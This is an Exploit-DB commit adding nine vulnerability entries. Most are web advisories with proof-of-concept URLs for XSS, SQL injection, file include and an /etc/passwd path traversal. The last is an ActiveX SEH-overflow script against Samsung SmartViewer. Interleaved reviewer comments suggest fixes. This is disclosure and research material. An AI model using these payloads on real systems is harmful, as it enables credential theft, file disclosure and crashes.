Update: 2015-01-21

9 new exploits
Offensive Security 2015-01-21 08:35:27 +00:00
parent 77291f0ca3
commit 66b6bb6da3
10 changed files with 127 additions and 0 deletions


@ -32274,3 +32274,12 @@ id,file,description,date,author,platform,type,port
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting Vulnerability",2011-06-06,"AutoSec Tools",php,webapps,0
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0
35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
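Review bot: the description for 35833 in this hunk reads "Xataface 1.x", which is looser than what the entry's own text records (the vendor says versions prior to 1.2.6, the reporter says 1.3rc1 and 1.3rc2); tightening the description to those versions would let someone scanning the index tell whether an install is in scope. The rows for 35826 (Joomla CCBoard) and 35830 (WooThemes test.php) carry no version at all, unlike every other row added here.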



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48106/info
vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script>
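Review bot: the PoC on the last line shows `sortorder` being reflected inside a double-quoted HTML attribute (the payload opens with `">` to break out of it), but the write-up never states the injection context or the fix; one line saying the parameter needs attribute-context HTML encoding on output, and that a sort order should be constrained to the few values it can legitimately take, would make the entry usable by someone patching it or writing a rule for it. Note also that the `+1,9` header counts nine lines while only five are rendered here, so the separator blank lines were lost in extraction.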


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48108/info
http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2
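Review bot: on the first line of this hunk the URL `http://www.noticeboardpro.com/notice-board-pro-copyright.html` is fused onto "Joomla CCBoard is prone to ..." and should be moved to its own line (or a reference line) so the description starts cleanly. The entry also names two distinct issues, SQL injection and arbitrary file upload, yet gives no affected version and the single URL is an ordinary post-list view, so unlike the neighbouring entries a defender cannot tell from this file whether an installation is in scope; at minimum record the version range the BID advisory covers.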


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48109/info
Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Nakid CMS 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//
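Review bot: the payload on the last line (`0);alert(0);//`) shows that `CKEditorFuncNum` is interpolated into a JavaScript call, not into HTML, so the generic "fails to sufficiently sanitize" wording undersells the point and the usual HTML-escaping fix does not apply; the correct fix is to validate the value as an integer before it reaches the script (the parameter is a numeric callback id), and a detection rule should look for non-digit characters in that parameter rather than for `<script`.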


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48110/info
Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
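Review bot: `_theme's_name_` in the URL is a placeholder but nothing says so, and the hunk names no affected theme versions; state both so the entry can be triaged. The issue is a leftover `includes/test.php` shipped with the themes that reflects its `a[]` array parameter, so the practical mitigation is deleting the test script from deployed themes rather than only patching the echo, and a quick check for site owners is simply whether that file exists under `wp-content/themes/`.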


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/48113/info
PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON
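Review bot: the two PoC lines do not map onto the issues the description lists: the first is tagged `[ SQL injection ]`, but the second, which pairs a `[Shell txt]` placeholder in `mode` with a fixed `password=nassrawi`, carries no tag, so it is unclear whether it stands for the remote file include, the local file include or the authentication bypass (and the stray `?` after the placeholder looks like a typo). Label each line with the issue it demonstrates. On the defending side, an include driven by `mode` is neutralised by an allowlist of module names plus `allow_url_include=Off` in php.ini.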


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48118/info
Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected.
http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000
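Review bot: the payload in `colour` closes a single-quoted JavaScript string (`';` ... `var x='`), so this is script-context injection, yet the write-up describes it only generically; recording the context matters because HTML-escaping alone would leave it open. Since a colour value is a fixed-length hex string, rejecting anything that does not match that shape before it reaches the page is the straightforward fix, and `pickerid` should get the same treatment.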


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48126/info
Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected.
http://www.example.com/index.php?-action=../../../../../../etc/passwd%00
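Review bot: the trailing `%00` on the last line means the PoC depends on null-byte truncation of the include path, which PHP rejects from 5.3.4 onwards (paths containing NUL are treated as invalid), so the entry should say that the form shown only applies to older PHP builds; the traversal through `-action` itself is independent of that and still needs fixing by resolving the parameter against an allowlist of action names. The NOTE line already records the version dispute, and a PHP-version caveat would sit naturally beside it.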

platforms/php/webapps/35834.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/48132/info
BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected.
http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>
http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
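Review bot: the second and third PoC URLs carry `&#039;` where the original clearly had a literal apostrophe; that is HTML-entity encoding picked up from the rendered advisory, and since the first and fourth lines already cover the same two pages with a numeric payload, the simplest fix is to drop the two entity-mangled duplicates. The last line, `mailfriend.php`, has no parameter or payload at all, so it is not clear which of the "multiple" issues it refers to; either complete it or move it to a reference note.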


@ -0,0 +1,45 @@
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>
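Review bot: the title and header comment say "Remote Code Execution", but the script only overwrites the SEH chain (156 bytes of `A`, `DD` as nSEH, a two-byte `\x87\x10` as SEH) and pads the rest with `B`, so what it demonstrates is a crash with a controlled exception handler, not code execution; the header should say so, or the PoC should be labelled as a crash trigger. Minor: `i` and `j` in the two `for` loops are never declared with `var`, and `<script >` has a stray space. For anyone triaging this, the mitigation that does not depend on a vendor fix is the ActiveX kill bit: setting `Compatibility Flags` to `0x400` under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{208650B1-3CA1-4406-926D-45F2DBB9C299}` stops Internet Explorer from instantiating the control.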